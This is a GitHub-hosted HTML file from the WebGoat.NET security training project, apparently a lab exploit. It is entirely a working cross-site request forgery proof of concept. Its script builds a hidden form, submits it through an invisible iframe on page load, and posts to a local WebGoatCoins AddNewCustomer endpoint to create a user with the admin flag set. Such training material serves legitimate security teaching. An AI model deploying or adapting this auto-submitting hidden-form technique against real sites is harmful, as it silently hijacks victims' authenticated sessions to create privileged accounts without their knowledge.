WebGoat.NET/CSRF-Exploit.html at 3f7b28023d22e1d248e1291b9064c0e132e01729 · jerryhoff/WebGoat.NET · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
<head>
</head>
<body>
    <script type="text/javascript">
        function sendRequest(method, path, params) {
            var form = document.createElement("form");
            form.setAttribute("method", method);
            form.setAttribute("action", path);
            form.setAttribute("target", "hidden-form");
            form.__submit = form.submit;

            for (var key in params)
            {
                var field = document.createElement("input");
                field.setAttribute("type", "hidden");
                field.setAttribute("name", key);
                field.setAttribute("value", params[key]);

                form.appendChild(field);
            }

            document.body.appendChild(form);

            var frame = document.createElement("iframe");
            frame.setAttribute("style", "display:none");
            frame.setAttribute("name", "hidden-form");
            document.body.appendChild(frame);

            form.__submit();
        }

        sendRequest('POST', 'http://localhost:3282/WebGoatCoins/AddNewCustomer.aspx',
            {'__VIEWSTATE':'',
             '__EVENTVALIDATION':'',
             'ctl00$BodyContentPlaceholder$Username':'test',
             'ctl00$BodyContentPlaceholder$Email':'test@test.com',
             'ctl00$BodyContentPlaceholder$Password':'test',
             'ctl00$BodyContentPlaceholder$IsAdmin':'on',
             'ctl00$BodyContentPlaceholder$CreateCustomerButton':''});
    </script>
</body>